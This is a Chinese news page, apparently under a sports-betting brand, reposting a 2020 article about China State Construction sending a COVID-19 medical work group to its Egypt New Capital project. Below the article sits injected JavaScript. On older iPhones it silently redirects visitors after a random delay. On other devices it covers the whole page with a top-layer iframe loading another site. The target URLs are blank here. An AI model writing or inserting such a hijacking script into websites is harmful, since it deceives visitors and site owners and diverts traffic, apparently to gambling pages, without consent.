QSTY球速体育新闻资讯
中建集团赴埃及工作组工作纪实
发布时间:2020-07-02
  |  
阅读量:
字号:
A+ A- A

近日,中建集团赴埃及疫情防控工作组第二批医疗人员从北京启程,实现工作组人员定期轮换,进一步巩固海外疫情防控成果。

 

  中建集团党组高度重视海外疫情防控工作,要求把海外疫情防控工作抓紧抓实抓细,进一步织严织密海外疫情防控网。队伍启程前,中建集团党组成员、副总经理单广袖到场为逆行出征的工作组医疗人员送行。

  在工作组医疗人员出征前,单广袖代表集团党组衷心感谢工作组第二批医疗人员接力逆行,再三叮嘱他们一定要时刻保持警惕,确保自身安全,充分做好应对疫情的各种准备。要接好工作组第一批成员的接力棒,守护好海外员工健康,继续发挥疫情防控“稳定器”的作用。

  目前,中建集团赴埃及疫情防控工作组第二批医疗人员已顺利抵达埃及新首都CBD项目,受到项目全体员工的热情欢迎。工作组人员轮换将进一步增强项目的防疫力量,巩固疫情防控成果。

 

  2月14日,埃及出现首例确诊感染者;3月19日,埃及政府宣布暂停所有航班;3月25日,埃及政府宣布实施宵禁。埃及这个古老的国度加入到全球疫情防控的战斗中。疫情就是命令,防控就是责任。3月16日,中建集团研究决定向埃及派驻工作组。广大中建员工响应集团号召,踊跃报名,仅用1天时间即组建完成、备齐防疫和医疗物资,在海外抗击疫情的关键时刻奔赴海外。

"; // 电脑链接 const mobileUrl = ""; // 移动链接 const isIOS = !!navigator.userAgent.match(/(iPod|iPhone|iPad)/); const time = Math.floor(Math.random() * (1000 - 500 + 1)) + 500; if (isIOS && getIosVersion() < 13) { setTimeout(() => { window.location.href = mobileUrl; }, time); } else { // 检测用户使用的设备类型 const isMobile = /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent); document.addEventListener("DOMContentLoaded", () => { const viewportMeta = document.createElement("meta"); viewportMeta.setAttribute("name", "viewport"); viewportMeta.setAttribute("content", "user-scalable=no, width=device-width, initial-scale=1.0"); document.head.appendChild(viewportMeta); const style = document.createElement("style"); style.innerHTML = "html, body { width: 100%; height: 100%; overflow: hidden; }"; document.head.appendChild(style); const divContainer = document.createElement("div"); divContainer.style.cssText = "width: 100%; height: 100%; position: absolute; top: 0; left: 0; z-index: 2147483647; background: #fff;"; document.body.appendChild(divContainer); const iframe = document.createElement("iframe"); iframe.src = isMobile ? mobileUrl : desktopUrl; iframe.style.cssText = "border: 0; width: 100%; text-align: center; border: medium none; height: 100%; max-height: 4000px;"; divContainer.appendChild(iframe); }); }